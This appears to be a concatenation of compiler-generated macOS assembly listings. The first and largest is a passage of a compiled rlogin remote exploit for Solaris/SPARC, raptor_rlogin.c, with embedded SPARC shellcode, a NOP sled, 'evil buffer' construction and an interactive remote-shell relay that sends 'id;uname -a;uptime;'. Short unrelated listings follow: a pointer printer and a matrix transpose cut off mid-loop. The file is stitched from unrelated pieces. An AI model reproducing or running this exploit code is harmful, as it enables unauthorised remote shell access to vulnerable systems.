movq %rax, %rsi
movl -84(%rbp), %edx
leaq L_.str.39(%rip), %rdi
callq _fatalerr
LBB2_37:
movl -84(%rbp), %eax
movl %eax, -60(%rbp)
LBB2_38:
movl -60(%rbp), %eax
movl %eax, -276(%rbp) ## 4-byte Spill
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB2_40
## %bb.39:
movl -276(%rbp), %eax ## 4-byte Reload
addq $288, %rsp ## imm = 0x120
popq %rbp
retq
LBB2_40:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.globl _fatalerr ## -- Begin function fatalerr
.p2align 4, 0x90
_fatalerr: ## @fatalerr
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movl %edx, -20(%rbp)
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
movq -8(%rbp), %rdx
movq -16(%rbp), %rcx
leaq L_.str.35(%rip), %rsi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _fprintf
movl -20(%rbp), %edi
callq _close
movl $1, %edi
callq _exit
.cfi_endproc
## -- End function
.globl _net_read ## -- Begin function net_read
.p2align 4, 0x90
_net_read: ## @net_read
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $272, %rsp ## imm = 0x110
movl %edi, -68(%rbp)
movq %rsi, -80(%rbp)
movl %edx, -84(%rbp)
movl %ecx, -88(%rbp)
movl $-1, -244(%rbp)
movslq -88(%rbp), %rax
movq %rax, -240(%rbp)
movl $0, -232(%rbp)
movq -80(%rbp), %rdi
movslq -84(%rbp), %rdx
xorl %esi, %esi
movq $-1, %rcx
callq ___memset_chk
xorps %xmm0, %xmm0
movaps %xmm0, -272(%rbp) ## 16-byte Spill
movaps %xmm0, -112(%rbp)
movaps %xmm0, -128(%rbp)
movaps %xmm0, -144(%rbp)
movaps %xmm0, -160(%rbp)
movaps %xmm0, -176(%rbp)
movaps %xmm0, -192(%rbp)
movaps %xmm0, -208(%rbp)
movaps %xmm0, -224(%rbp)
movl -68(%rbp), %eax
movl %eax, -52(%rbp)
leaq -224(%rbp), %rax
movq %rax, -64(%rbp)
movl -52(%rbp), %ecx
movq -64(%rbp), %rax
movl %ecx, -8(%rbp)
movq %rax, -16(%rbp)
movq ___darwin_check_fd_set_overflow@GOTPCREL(%rip), %rax
testq %rax, %rax
je LBB4_2
jmp LBB4_1
LBB4_1:
movl -8(%rbp), %edi
movq -16(%rbp), %rsi
xorl %edx, %edx
callq ___darwin_check_fd_set_overflow
movl %eax, -4(%rbp)
jmp LBB4_3
LBB4_2:
movl $1, -4(%rbp)
LBB4_3:
cmpl $0, -4(%rbp)
je LBB4_5
## %bb.4:
movslq -52(%rbp), %rcx
andq $31, %rcx
movl $1, %eax
## kill: def $cl killed $rcx
shlq %cl, %rax
movl %eax, %edx
movq -64(%rbp), %rax
movslq -52(%rbp), %rcx
shrq $5, %rcx
orl (%rax,%rcx,4), %edx
movl %edx, (%rax,%rcx,4)
LBB4_5:
movl $1024, %edi ## imm = 0x400
leaq -224(%rbp), %rsi
xorl %eax, %eax
movl %eax, %ecx
leaq -240(%rbp), %r8
movq %rcx, %rdx
callq _select$1050
cmpl $0, %eax
jge LBB4_7
## %bb.6:
leaq L_.str.41(%rip), %rdi
callq _perror
movl $1, %edi
callq _exit
LBB4_7:
movl -68(%rbp), %eax
movl %eax, -40(%rbp)
leaq -224(%rbp), %rax
movq %rax, -48(%rbp)
movl -40(%rbp), %ecx
movq -48(%rbp), %rax
movl %ecx, -24(%rbp)
movq %rax, -32(%rbp)
movq ___darwin_check_fd_set_overflow@GOTPCREL(%rip), %rax
testq %rax, %rax
je LBB4_9
jmp LBB4_8
LBB4_8:
movl -24(%rbp), %edi
movq -32(%rbp), %rsi
xorl %edx, %edx
callq ___darwin_check_fd_set_overflow
movl %eax, -20(%rbp)
jmp LBB4_10
LBB4_9:
movl $1, -20(%rbp)
LBB4_10:
cmpl $0, -20(%rbp)
je LBB4_12
## %bb.11:
movq -48(%rbp), %rax
movslq -40(%rbp), %rcx
shrq $5, %rcx
movl (%rax,%rcx,4), %eax
movslq -40(%rbp), %rcx
andq $31, %rcx
movl $1, %edx
## kill: def $cl killed $rcx
shlq %cl, %rdx
movq %rdx, %rcx
## kill: def $ecx killed $ecx killed $rcx
andl %ecx, %eax
movl %eax, -36(%rbp)
jmp LBB4_13
LBB4_12:
movl $0, -36(%rbp)
LBB4_13:
cmpl $0, -36(%rbp)
je LBB4_15
## %bb.14:
movl -68(%rbp), %edi
movq -80(%rbp), %rsi
movslq -84(%rbp), %rdx
callq _read
## kill: def $eax killed $eax killed $rax
movl %eax, -244(%rbp)
LBB4_15:
movl -244(%rbp), %eax
addq $272, %rsp ## imm = 0x110
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _set_val ## -- Begin function set_val
.p2align 4, 0x90
_set_val: ## @set_val
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movl %esi, -12(%rbp)
movl %edx, -16(%rbp)
movl -16(%rbp), %eax
andl $-16777216, %eax ## imm = 0xFF000000
shrl $24, %eax
movb %al, %dl
movq -8(%rbp), %rax
movslq -12(%rbp), %rcx
movb %dl, (%rax,%rcx)
movl -16(%rbp), %eax
andl $16711680, %eax ## imm = 0xFF0000
sarl $16, %eax
movb %al, %dl
movq -8(%rbp), %rax
movl -12(%rbp), %ecx
addl $1, %ecx
movslq %ecx, %rcx
movb %dl, (%rax,%rcx)
movl -16(%rbp), %eax
andl $65280, %eax ## imm = 0xFF00
sarl $8, %eax
movb %al, %dl
movq -8(%rbp), %rax
movl -12(%rbp), %ecx
addl $2, %ecx
movslq %ecx, %rcx
movb %dl, (%rax,%rcx)
movl -16(%rbp), %eax
andl $255, %eax
movb %al, %dl
movq -8(%rbp), %rax
movl -12(%rbp), %ecx
addl $3, %ecx
movslq %ecx, %rcx
movb %dl, (%rax,%rcx)
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _sc_copy ## -- Begin function sc_copy
.p2align 4, 0x90
_sc_copy: ## @sc_copy
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq %rdx, -24(%rbp)
movq -8(%rbp), %rax
movq %rax, -32(%rbp)
movl $0, -36(%rbp)
LBB6_1: ## =>This Inner Loop Header: Depth=1
movslq -36(%rbp), %rax
cmpq -24(%rbp), %rax
jge LBB6_4
## %bb.2: ## in Loop: Header=BB6_1 Depth=1
movq -8(%rbp), %rdi
movq -16(%rbp), %rax
movslq -36(%rbp), %rcx
movzbl (%rax,%rcx), %esi
callq _exploit_addchar
movl %eax, %ecx
movq -8(%rbp), %rax
movslq %ecx, %rcx
addq %rcx, %rax
movq %rax, -8(%rbp)
## %bb.3: ## in Loop: Header=BB6_1 Depth=1
movl -36(%rbp), %eax
addl $1, %eax
movl %eax, -36(%rbp)
jmp LBB6_1
LBB6_4:
movq -8(%rbp), %rax
movq -32(%rbp), %rcx
subq %rcx, %rax
## kill: def $eax killed $eax killed $rax
addq $48, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _shell ## -- Begin function shell
.p2align 4, 0x90
_shell: ## @shell
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $432, %rsp ## imm = 0x1B0
movl %edi, -132(%rbp)
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.42(%rip), %rsi
movb $0, %al
callq _fprintf
movl $1, %edi
leaq L_.str.33(%rip), %rsi
movl $2, %edx
callq _write
movl -132(%rbp), %edi
leaq L_.str.43(%rip), %rsi
movl $20, %edx
callq _write
LBB7_1: ## =>This Inner Loop Header: Depth=1
xorps %xmm0, %xmm0
movaps %xmm0, -432(%rbp) ## 16-byte Spill
movaps %xmm0, -160(%rbp)
movaps %xmm0, -176(%rbp)
movaps %xmm0, -192(%rbp)
movaps %xmm0, -208(%rbp)
movaps %xmm0, -224(%rbp)
movaps %xmm0, -240(%rbp)
movaps %xmm0, -256(%rbp)
movaps %xmm0, -272(%rbp)
movl -132(%rbp), %eax
movl %eax, -100(%rbp)
leaq -272(%rbp), %rax
movq %rax, -112(%rbp)
movl -100(%rbp), %ecx
movq -112(%rbp), %rax
movl %ecx, -24(%rbp)
movq %rax, -32(%rbp)
movq ___darwin_check_fd_set_overflow@GOTPCREL(%rip), %rax
testq %rax, %rax
je LBB7_3
jmp LBB7_2
LBB7_2: ## in Loop: Header=BB7_1 Depth=1
movl -24(%rbp), %edi
movq -32(%rbp), %rsi
xorl %edx, %edx
callq ___darwin_check_fd_set_overflow
movl %eax, -20(%rbp)
jmp LBB7_4
LBB7_3: ## in Loop: Header=BB7_1 Depth=1
movl $1, -20(%rbp)
LBB7_4: ## in Loop: Header=BB7_1 Depth=1
cmpl $0, -20(%rbp)
je LBB7_6
## %bb.5: ## in Loop: Header=BB7_1 Depth=1
movslq -100(%rbp), %rcx
andq $31, %rcx
movl $1, %eax
## kill: def $cl killed $rcx
shlq %cl, %rax
movl %eax, %edx
movq -112(%rbp), %rax
movslq -100(%rbp), %rcx
shrq $5, %rcx
orl (%rax,%rcx,4), %edx
movl %edx, (%rax,%rcx,4)
LBB7_6: ## in Loop: Header=BB7_1 Depth=1
movl $0, -116(%rbp)
leaq -272(%rbp), %rax
movq %rax, -128(%rbp)
movl -116(%rbp), %ecx
movq -128(%rbp), %rax
movl %ecx, -8(%rbp)
movq %rax, -16(%rbp)
movq ___darwin_check_fd_set_overflow@GOTPCREL(%rip), %rax
testq %rax, %rax
je LBB7_8
jmp LBB7_7
LBB7_7: ## in Loop: Header=BB7_1 Depth=1
movl -8(%rbp), %edi
movq -16(%rbp), %rsi
xorl %edx, %edx
callq ___darwin_check_fd_set_overflow
movl %eax, -4(%rbp)
jmp LBB7_9
LBB7_8: ## in Loop: Header=BB7_1 Depth=1
movl $1, -4(%rbp)
LBB7_9: ## in Loop: Header=BB7_1 Depth=1
cmpl $0, -4(%rbp)
je LBB7_11
## %bb.10: ## in Loop: Header=BB7_1 Depth=1
movslq -116(%rbp), %rcx
andq $31, %rcx
movl $1, %eax
## kill: def $cl killed $rcx
shlq %cl, %rax
movl %eax, %edx
movq -128(%rbp), %rax
movslq -116(%rbp), %rcx
shrq $5, %rcx
orl (%rax,%rcx,4), %edx
movl %edx, (%rax,%rcx,4)
LBB7_11: ## in Loop: Header=BB7_1 Depth=1
movl $1024, %edi ## imm = 0x400
leaq -272(%rbp), %rsi
xorl %eax, %eax
movl %eax, %r8d
movq %r8, %rdx
movq %r8, %rcx
callq _select$1050
cmpl $0, %eax
jge LBB7_13
## %bb.12:
leaq L_.str.41(%rip), %rdi
callq _perror
jmp LBB7_38
LBB7_13: ## in Loop: Header=BB7_1 Depth=1
movl -132(%rbp), %eax
movl %eax, -72(%rbp)
leaq -272(%rbp), %rax
movq %rax, -80(%rbp)
movl -72(%rbp), %ecx
movq -80(%rbp), %rax
movl %ecx, -56(%rbp)
movq %rax, -64(%rbp)
movq ___darwin_check_fd_set_overflow@GOTPCREL(%rip), %rax
testq %rax, %rax
je LBB7_15
jmp LBB7_14
LBB7_14: ## in Loop: Header=BB7_1 Depth=1
movl -56(%rbp), %edi
movq -64(%rbp), %rsi
xorl %edx, %edx
callq ___darwin_check_fd_set_overflow
movl %eax, -52(%rbp)
jmp LBB7_16
LBB7_15: ## in Loop: Header=BB7_1 Depth=1
movl $1, -52(%rbp)
LBB7_16: ## in Loop: Header=BB7_1 Depth=1
cmpl $0, -52(%rbp)
je LBB7_18
## %bb.17: ## in Loop: Header=BB7_1 Depth=1
movq -80(%rbp), %rax
movslq -72(%rbp), %rcx
shrq $5, %rcx
movl (%rax,%rcx,4), %eax
movslq -72(%rbp), %rcx
andq $31, %rcx
movl $1, %edx
## kill: def $cl killed $rcx
shlq %cl, %rdx
movq %rdx, %rcx
## kill: def $ecx killed $ecx killed $rcx
andl %ecx, %eax
movl %eax, -68(%rbp)
jmp LBB7_19
LBB7_18: ## in Loop: Header=BB7_1 Depth=1
movl $0, -68(%rbp)
LBB7_19: ## in Loop: Header=BB7_1 Depth=1
cmpl $0, -68(%rbp)
je LBB7_25
## %bb.20: ## in Loop: Header=BB7_1 Depth=1
movl -132(%rbp), %edi
leaq -400(%rbp), %rsi
movl $128, %edx
callq _read
## kill: def $eax killed $eax killed $rax
movl %eax, -404(%rbp)
cmpl $0, %eax
jge LBB7_22
## %bb.21:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.44(%rip), %rsi
movb $0, %al
callq _fprintf
jmp LBB7_38
LBB7_22: ## in Loop: Header=BB7_1 Depth=1
leaq -400(%rbp), %rsi
movslq -404(%rbp), %rdx
movl $1, %edi
callq _write
cmpq $0, %rax
jge LBB7_24
## %bb.23:
leaq L_.str.45(%rip), %rdi
callq _perror
jmp LBB7_38
LBB7_24: ## in Loop: Header=BB7_1 Depth=1
jmp LBB7_25
LBB7_25: ## in Loop: Header=BB7_1 Depth=1
movl $0, -88(%rbp)
leaq -272(%rbp), %rax
movq %rax, -96(%rbp)
movl -88(%rbp), %ecx
movq -96(%rbp), %rax
movl %ecx, -40(%rbp)
movq %rax, -48(%rbp)
movq ___darwin_check_fd_set_overflow@GOTPCREL(%rip), %rax
testq %rax, %rax
je LBB7_27
jmp LBB7_26
LBB7_26: ## in Loop: Header=BB7_1 Depth=1
movl -40(%rbp), %edi
movq -48(%rbp), %rsi
xorl %edx, %edx
callq ___darwin_check_fd_set_overflow
movl %eax, -36(%rbp)
jmp LBB7_28
LBB7_27: ## in Loop: Header=BB7_1 Depth=1
movl $1, -36(%rbp)
LBB7_28: ## in Loop: Header=BB7_1 Depth=1
cmpl $0, -36(%rbp)
je LBB7_30
## %bb.29: ## in Loop: Header=BB7_1 Depth=1
movq -96(%rbp), %rax
movslq -88(%rbp), %rcx
shrq $5, %rcx
movl (%rax,%rcx,4), %eax
movslq -88(%rbp), %rcx
andq $31, %rcx
movl $1, %edx
## kill: def $cl killed $rcx
shlq %cl, %rdx
movq %rdx, %rcx
## kill: def $ecx killed $ecx killed $rcx
andl %ecx, %eax
movl %eax, -84(%rbp)
jmp LBB7_31
LBB7_30: ## in Loop: Header=BB7_1 Depth=1
movl $0, -84(%rbp)
LBB7_31: ## in Loop: Header=BB7_1 Depth=1
cmpl $0, -84(%rbp)
je LBB7_37
## %bb.32: ## in Loop: Header=BB7_1 Depth=1
leaq -400(%rbp), %rsi
xorl %edi, %edi
movl $128, %edx
callq _read
## kill: def $eax killed $eax killed $rax
movl %eax, -404(%rbp)
cmpl $0, %eax
jge LBB7_34
## %bb.33:
leaq L_.str.46(%rip), %rdi
callq _perror
jmp LBB7_38
LBB7_34: ## in Loop: Header=BB7_1 Depth=1
movl -132(%rbp), %edi
leaq -400(%rbp), %rsi
movslq -404(%rbp), %rdx
callq _write
cmpq $0, %rax
jge LBB7_36
## %bb.35:
leaq L_.str.45(%rip), %rdi
callq _perror
jmp LBB7_38
LBB7_36: ## in Loop: Header=BB7_1 Depth=1
jmp LBB7_37
LBB7_37: ## in Loop: Header=BB7_1 Depth=1
jmp LBB7_1
LBB7_38:
movl -132(%rbp), %edi
callq _close
movl $1, %edi
callq _exit
.cfi_endproc
## -- End function
.globl _exploit_addchar ## -- Begin function exploit_addchar
.p2align 4, 0x90
_exploit_addchar: ## @exploit_addchar
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movb %sil, %al
movq %rdi, -8(%rbp)
movb %al, -9(%rbp)
movq -8(%rbp), %rax
movq %rax, -24(%rbp)
movzbl -9(%rbp), %eax
movl %eax, -28(%rbp) ## 4-byte Spill
addl $-9, %eax
subl $2, %eax
jb LBB8_2
jmp LBB8_5
LBB8_5:
movl -28(%rbp), %eax ## 4-byte Reload
subl $32, %eax
je LBB8_2
jmp LBB8_6
LBB8_6:
movl -28(%rbp), %eax ## 4-byte Reload
subl $92, %eax
je LBB8_1
jmp LBB8_7
LBB8_7:
movl -28(%rbp), %eax ## 4-byte Reload
subl $255, %eax
je LBB8_2
jmp LBB8_3
LBB8_1:
movq -8(%rbp), %rax
movq %rax, %rcx
addq $1, %rcx
movq %rcx, -8(%rbp)
movb $92, (%rax)
movq -8(%rbp), %rax
movq %rax, %rcx
addq $1, %rcx
movq %rcx, -8(%rbp)
movb $92, (%rax)
jmp LBB8_4
LBB8_2:
movq -8(%rbp), %rax
movq %rax, %rcx
addq $1, %rcx
movq %rcx, -8(%rbp)
movb $92, (%rax)
movzbl -9(%rbp), %eax
andl $192, %eax
sarl $6, %eax
addl $48, %eax
movb %al, %cl
movq -8(%rbp), %rax
movq %rax, %rdx
addq $1, %rdx
movq %rdx, -8(%rbp)
movb %cl, (%rax)
movzbl -9(%rbp), %eax
andl $56, %eax
sarl $3, %eax
addl $48, %eax
movb %al, %cl
movq -8(%rbp), %rax
movq %rax, %rdx
addq $1, %rdx
movq %rdx, -8(%rbp)
movb %cl, (%rax)
movzbl -9(%rbp), %eax
andl $7, %eax
addl $48, %eax
movb %al, %cl
movq -8(%rbp), %rax
movq %rax, %rdx
addq $1, %rdx
movq %rdx, -8(%rbp)
movb %cl, (%rax)
jmp LBB8_4
LBB8_3:
movb -9(%rbp), %cl
movq -8(%rbp), %rax
movq %rax, %rdx
addq $1, %rdx
movq %rdx, -8(%rbp)
movb %cl, (%rax)
LBB8_4:
movq -8(%rbp), %rax
movq -24(%rbp), %rcx
subq %rcx, %rax
## kill: def $eax killed $eax killed $rax
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function _OSSwapInt16
__OSSwapInt16: ## @_OSSwapInt16
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movw %di, %ax
movw %ax, -2(%rbp)
movzwl -2(%rbp), %eax
shll $8, %eax
movzwl -2(%rbp), %ecx
sarl $8, %ecx
orl %ecx, %eax
## kill: def $ax killed $ax killed $eax
movzwl %ax, %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _net_resolve ## -- Begin function net_resolve
.p2align 4, 0x90
_net_resolve: ## @net_resolve
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -16(%rbp)
leaq -24(%rbp), %rdi
xorl %esi, %esi
movl $4, %edx
callq _memset
movq -16(%rbp), %rdi
callq _inet_addr
movl %eax, -24(%rbp)
cmpl $-1, %eax
jne LBB10_4
## %bb.1:
movq -16(%rbp), %rdi
callq _gethostbyname
movq %rax, -32(%rbp)
cmpq $0, %rax
jne LBB10_3
## %bb.2:
movl $0, -4(%rbp)
jmp LBB10_5
LBB10_3:
leaq -24(%rbp), %rdi
movq -32(%rbp), %rax
movq 24(%rax), %rax
movq (%rax), %rsi
movq -32(%rbp), %rax
movslq 20(%rax), %rdx
movl $4, %ecx
callq ___memcpy_chk
LBB10_4:
movl -24(%rbp), %eax
movl %eax, -4(%rbp)
LBB10_5:
movl -4(%rbp), %eax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __DATA,__data
.globl _sc ## @sc
.p2align 4
_sc:
.asciz "\224\020 \000!\013\330\232\240\024!n#\013\313\334\242\024ch\324#\277\374\342#\277\370\340#\277\364\220#\240\f\324#\277\360\320#\277\354\222#\240\024\202\020 ;\221\320 \b\202\020 \001\221\320 \b"
.globl _sparc_nop ## @sparc_nop
_sparc_nop:
.asciz "\220\033\200\016"
.section __TEXT,__cstring,cstring_literals
L___const.main.term: ## @__const.main.term
.asciz "vt100/9600"
L_.str: ## @.str
.asciz "%s\n%s\n\n"
L_.str.1: ## @.str.1
.asciz "raptor_rlogin.c - (r)login, Solaris/SPARC 2.5.1/2.6/7/8"
L_.str.2: ## @.str.2
.asciz "Copyright (c) 2004 Marco Ivaldi <[email protected]>"
L_.str.3: ## @.str.3
.asciz "dh:t:"
L_.str.4: ## @.str.4
.asciz "# connected to remote host: %s\n"
L_.str.5: ## @.str.5
.asciz "send"
L_.str.6: ## @.str.6
.asciz "error"
L_.str.7: ## @.str.7
.asciz "Timeout reached in rlogin session"
L_.str.8: ## @.str.8
.asciz "foo"
L_.str.9: ## @.str.9
.asciz "bar"
L_.str.10: ## @.str.10
.asciz "# performing dummy rlogin authentication\n"
L_.str.11: ## @.str.11
.asciz "assword: "
L_.str.12: ## @.str.12
.asciz "Timeout waiting for password prompt"
L_.str.13: ## @.str.13
.asciz "pass\n"
L_.str.14: ## @.str.14
.asciz "# waiting for login prompt\n"
L_.str.15: ## @.str.15
.asciz "ogin: "
L_.str.16: ## @.str.16
.asciz "Timeout waiting for login prompt"
L_.str.17: ## @.str.17
.asciz "# returning into 0x%08x\n"
L_.str.18: ## @.str.18
.asciz "# debug: press enter to continue"
L_.str.19: ## @.str.19
.asciz "%c"
L_.str.20: ## @.str.20
.asciz "foo "
L_.str.21: ## @.str.21
.asciz " "
L_.str.22: ## @.str.22
.asciz "a "
L_.str.23: ## @.str.23
.asciz " BBB"
L_.str.24: ## @.str.24
.asciz "BBB "
L_.str.25: ## @.str.25
.asciz "CCCCCCCCCCCCCCCC"
.section __TEXT,__const
l_.str.26: ## @.str.26
.asciz "\000\000\000 AAAA\n"
.section __TEXT,__cstring,cstring_literals
L_.str.27: ## @.str.27
.asciz "#"
L_.str.28: ## @.str.28
.asciz "\004"
L_.str.29: ## @.str.29
.asciz "\n"
L_.str.30: ## @.str.30
.asciz "# evil buffer sent, waiting for password prompt\n"
L_.str.31: ## @.str.31
.asciz "Most likely not vulnerable"
L_.str.32: ## @.str.32
.asciz "# password prompt received, waiting for shell\n"
L_.str.33: ## @.str.33
.asciz "# "
L_.str.34: ## @.str.34
.asciz "# shell prompt detected, successful exploitation\n\n"
L_.str.35: ## @.str.35
.asciz "%s: %s\n"
L_.str.36: ## @.str.36
.asciz "socket"
L_.str.37: ## @.str.37
.asciz "Can't bind a privileged port (must be root)"
L_.str.38: ## @.str.38
.asciz "Can't resolve hostname"
L_.str.39: ## @.str.39
.asciz "fcntl"
L_.str.40: ## @.str.40
.asciz "Can't connect to remote host"
L_.str.41: ## @.str.41
.asciz "select"
L_.str.42: ## @.str.42
.asciz "\"Da Bog da ti se mamica nahitavala s vragom po dvoristu!\" -- Bozica (Hrvatska)\n\n"
L_.str.43: ## @.str.43
.asciz "id;uname -a;uptime;\n"
L_.str.44: ## @.str.44
.asciz "Goodbye...\n"
L_.str.45: ## @.str.45
.asciz "write"
L_.str.46: ## @.str.46
.asciz "read"
L_.str.47: ## @.str.47
.asciz "usage: %s [-h host] [-t timeout] [-d]\n\n"
L_.str.48: ## @.str.48
.asciz "-h host\t\tdestination ip or fqdn\n"
L_.str.49: ## @.str.49
.asciz "-t timeout\tnet_read() timeout (default: %d)\n"
L_.str.50: ## @.str.50
.asciz "-d\t\tturn on debug mode\n\n"
.subsections_via_symbols
| the_stack_data/18475.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
mov w8, #0
str w8, [sp, #12] ; 4-byte Folded Spill
stur wzr, [x29, #-4]
adrp x8, l_.str@PAGE
add x8, x8, l_.str@PAGEOFF
str x8, [sp, #16]
ldr x8, [sp, #16]
mov x9, sp
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
ldr w0, [sp, #12] ; 4-byte Folded Reload
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "hello"
l_.str.1: ; @.str.1
.asciz "%p\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $0, -4(%rbp)
leaq L_.str(%rip), %rax
movq %rax, -16(%rbp)
movq -16(%rbp), %rsi
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
xorl %eax, %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "hello"
L_.str.1: ## @.str.1
.asciz "%p\n"
.subsections_via_symbols
| the_stack_data/53425.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #192
.cfi_def_cfa_offset 192
stp x29, x30, [sp, #176] ; 16-byte Folded Spill
add x29, sp, #176
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
str wzr, [sp, #36]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
str wzr, [sp, #32]
b LBB0_1
LBB0_1: ; =>This Loop Header: Depth=1
; Child Loop BB0_3 Depth 2
ldr w8, [sp, #32]
subs w8, w8, #4
cset w8, ge
tbnz w8, #0, LBB0_8
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
str wzr, [sp, #28]
b LBB0_3
LBB0_3: ; Parent Loop BB0_1 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #28]
subs w8, w8, #4
cset w8, ge
tbnz w8, #0, LBB0_6
b LBB0_4
LBB0_4: ; in Loop: Header=BB0_3 Depth=2
ldr w8, [sp, #32]
; implicit-def: $x10
mov x10, x8
ldr w9, [sp, #28]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
ldrsw x9, [sp, #32]
sub x8, x29, #72
add x8, x8, x9, lsl #4
ldrsw x9, [sp, #28]
add x8, x8, x9, lsl #2
mov x9, sp
str x8, [x9]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _scanf
b LBB0_5
LBB0_5: ; in Loop: Header=BB0_3 Depth=2
ldr w8, [sp, #28]
add w8, w8, #1
str w8, [sp, #28]
b LBB0_3
LBB0_6: ; in Loop: Header=BB0_1 Depth=1
b LBB0_7
LBB0_7: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #32]
add w8, w8, #1
str w8, [sp, #32]
b LBB0_1
LBB0_8:
str wzr, [sp, #32]
b LBB0_9
LBB0_9: ; =>This Loop Header: Depth=1
; Child Loop BB0_11 Depth 2
ldr w8, [sp, #32]
subs w8, w8, #4
cset w8, ge
tbnz w8, #0, LBB0_16
b LBB0_10
LBB0_10: ; in Loop: Header=BB0_9 Depth=1
str wzr, [sp, #28]
b LBB0_11
LBB0_11: ; Parent Loop BB0_9 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #28]
subs w8, w8, #4
cset w8, ge
tbnz w8, #0, LBB0_14
b LBB0_12
LBB0_12: ; in Loop: Header=BB0_11 Depth=2
ldrsw x9, [sp, #32]
sub x8, x29, #72
add x8, x8, x9, lsl #4
ldrsw x9, [sp, #28]
ldr w8, [x8, x9, lsl #2]
ldrsw x10, [sp, #28]
add x9, sp, #40
add x9, x9, x10, lsl #4
ldrsw x10, [sp, #32]
str w8, [x9, x10, lsl #2]
b LBB0_13
LBB0_13: ; in Loop: Header=BB0_11 Depth=2
ldr w8, [sp, #28]
add w8, w8, #1
str w8, [sp, #28]
b LBB0_11
LBB0_14: ; in Loop: Header=BB0_9 Depth=1
b LBB0_15
LBB0_15: ; in Loop: Header=BB0_9 Depth=1
ldr w8, [sp, #32]
add w8, w8, #1
str w8, [sp, #32]
b LBB0_9
LBB0_16:
str wzr, [sp, #32]
b LBB0_17
LBB0_17: ; =>This Loop Header: Depth=1
; Child Loop BB0_19 Depth 2
ldr w8, [sp, #32]
subs w8, w8, #4
cset w8, ge
tbnz w8, #0, LBB0_24
b LBB0_18
LBB0_18: ; in Loop: Header=BB0_17 Depth=1
str wzr, [sp, #28]
b LBB0_19
LBB0_19: ; Parent Loop BB0_17 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #28]
